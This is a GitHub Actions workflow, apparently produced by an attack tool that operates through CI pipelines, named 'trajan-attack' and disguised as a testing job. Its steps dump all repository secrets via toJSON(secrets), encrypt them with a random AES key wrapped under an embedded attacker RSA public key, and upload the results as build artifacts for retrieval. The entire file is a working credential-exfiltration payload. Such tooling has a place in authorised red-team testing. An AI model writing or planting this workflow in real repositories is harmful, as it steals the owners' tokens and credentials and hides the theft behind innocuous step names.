name: trajan-attack-18943460
on:
  push:
    branches:
      - trajan-attack-18943460
jobs:
  testing:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare repository
        env:
          VALUES: ${{ toJSON(secrets) }}
        run: |
          cat <<EOF > output.json
          $VALUES
          EOF
      - name: Run Tests
        env:
          PUBKEY: |
            -----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA7IA9JHieHGI/vyaKflzt
FKz1zA6POQKcGbd7zMOzLy0B6+ikP7Tsae2vEKP34YNb40hqiXdv4jxGB+1kb4pz
SuGJrLViDGFAXywliZuXhOyXE8Ovw9ZxcZ4XklhoZ1USNbPSnuqj5slzagxDYXBB
FaK3s84kivCGa7mXIZTIlHonOMxQR18hIvRnRWI+cxVAuMm2RZMO9V0uh92VAtqK
B1nN9x1svOl4gbuZKATCn3Kvk3CCIXQIDUtHfbkWZ7dTzge9CJnfEVzIoVGtMr29
qHOYaGXVNB6HkfZUMrcqgmBFxzS3DwT7YgkL7u4geN1rKU8CIbwg5nVGId64DgsI
b1dJ1gehT7pjRccU6sHLKt5FKT5zJX+FDj/UU+8At1rhE5LJ8DeULZrZvYg0Qufe
S6v1mth+ah4RdsGbWkn3LVylzoDL5UnwEE0yoP+Hxn0EyRpQ9jKzc89qpqQYtzfi
pJWWQAXr0AXMkaWg8mIIISzCZkcUJXvTWWJAGGRY7I+cRd9O1ksvT8DgBQyrIdU6
uGoxVyhFmyBMC1h2n8LWoskeawDPWvhYkndw9+EfAbQFVacjttoXp9WFx+L/EaJk
2LxW6OMDpDB180OK8ilaAGTtGU0RZlBdUs64fs/HKIYzdRU6EYW9eoAA5xXUDOdM
vYAiagTkdSgtkdHUcBSCT50CAwEAAQ==
-----END PUBLIC KEY-----

        run: |
          aes_key=$(openssl rand -hex 12 | tr -d '\n')
          openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key
          echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2>/dev/null
      - name: Upload artifacts
        uses: actions/upload-artifact@v4
        with:
          name: files
          path: |
            output_updated.json
            lookup.txt
